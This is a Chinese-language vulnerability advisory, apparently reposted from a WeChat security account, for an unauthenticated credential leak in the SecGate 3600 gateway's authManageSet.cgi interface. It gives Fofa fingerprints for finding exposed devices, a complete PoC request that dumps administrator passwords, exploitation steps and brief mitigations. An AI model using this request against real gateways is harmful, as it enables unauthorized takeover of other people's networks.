漏洞详情:
SecGate3600是网神信息技术(北京)股份有限公司旗下一款安全网关产品,由于网神SecGate 3600 authManageSet.cgi接口存在敏感信息泄露漏洞,未授权得攻击者可以通过此漏洞获取控制台管理员用户名密码等敏感信息,可登录控制整个后台。
影响范围
SecGate3600-A1500 v3.6.6.0(v2.64.02)
Fofa
body="sec_gate_image/login_02.gif"
fid="ldb0WVBlAgZloMw9AAge0A=="
poc
POST /cgi-bin/authUser/authManageSet.cgi HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close
type=getAllUsers&_search=false&nd=1645000391264&rows=-1&page=1&sidx=&sord=asc
1、使用浏览器访问目标系统,并使用BurpSuite进行拦截抓包;
/cgi-bin/authUser/authManageSet.cgi
接口地址,请求内容为:
type=getAllUsers&_search=false&nd=1645000391264&rows=-1&page=1&sidx=&sord=asc
其他内容不修改
3、当请求结果状态码返回为200后,就能从返回结果获取到登录账号密码信息,并且使用获取的账号密码可登录后台。
1 将authManageSet.cgi接口特征添加WAF规则,进行网络攻击行为拦截;
2 取消互联网映射或设置指定IP访问。
原文始发于微信公众号(不秃头的安全):漏洞情报-某神SecGate3600 authManageSet.cgi信息泄露漏洞
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论